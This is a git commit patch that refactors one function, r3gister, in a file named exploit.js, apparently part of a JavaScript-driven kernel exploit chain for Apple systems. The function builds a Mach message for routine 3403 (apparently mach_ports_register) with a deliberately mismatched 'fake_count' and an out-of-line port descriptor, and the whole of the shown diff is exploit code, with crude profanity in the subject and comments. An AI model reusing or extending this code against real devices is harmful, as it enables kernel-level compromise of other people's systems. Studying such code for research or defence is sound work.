From 7a206940e14b0d269744bd598be075e33ef19aea Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Mon, 1 Aug 2022 13:45:45 -0400
Subject: fuck

---
 src/stage4/kexp/exploit.js | 43 ++++++++++++++++++++++++-------------------
 1 file changed, 24 insertions(+), 19 deletions(-)

(limited to 'src/stage4/kexp')

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8103639..327c813 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -277,28 +277,33 @@ function release_port_ptrs(port) {
 
 function r3gister(task, init_port_set, real_count, fake_count) {
 	var mess = shit_heap(0x1000);
-//	var InP = mess;
-//	var OutP = mess;
-
-	var InP = new Request(1, mess);
-	var OutP = new Reply(1, mess);
-
-	write_u32(InP + 0x18, 1);
-	write_u32(InP + 0x1c, init_port_set);
-	write_u32(InP + 0x20, real_count);
-	write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
-	write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
-	write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
-	write_u32(InP + 0x30, fake_count);
-	write_u32(InP + 0x0, 0x80001513);
-	write_u32(InP + 0x8, task);
-	write_u32(InP + 0xc, mig_get_reply_port());
-	write_u32(InP + 0x14, 3403);
-
-	var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+	var InP_ptr = mess;
+	var OutP = mess;
+
+	var InP = new Request_r3(1, mess);
+	var InP_obj = InP.deref();
+
+	InP_obj.msgh_body.msgh_descriptor_count = 1;
+	InP_obj.init_port_set.address = init_port_set;
+	InP_obj.init_port_set.count = real_count;
+	InP_obj.init_port_set.disposition = 19;
+	InP_obj.init_port_set.deallocate = false;
+	InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+	InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8);
+	InP_obj.init_port_setCnt = fake_count;
+    InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+    InP_obj.Head.msgh_remote_port = task;
+    InP_obj.Head.msgh_local_port = mig_get_reply_port();
+    InP_obj.Head.msgh_id = 3403;
+
+	InP.write(InP_obj);
+
+	var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
 	if (ret == KERN_SUCCESS) {
+		// i'm not making a fucking class for this shit
 		ret = read_u32(OutP + 0x24);
 	}
+
 	return ret;
 }
 
-- 
cgit v1.2.3